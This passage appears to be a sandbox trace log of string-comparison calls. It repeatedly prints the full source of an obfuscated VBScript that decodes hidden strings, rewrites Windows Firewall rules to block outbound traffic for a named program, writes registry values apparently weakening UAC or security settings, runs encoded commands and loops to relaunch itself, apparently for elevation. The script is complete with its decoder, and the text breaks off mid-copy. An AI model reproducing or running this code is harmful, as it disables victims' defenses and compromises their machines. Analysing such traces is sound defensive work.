Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.928] wcsncmp (_String1="1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.928] wcsncmp (_String1="\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 68 [0222.929] wcsncmp (_String1="\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.929] wcsncmp (_String1="key = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = 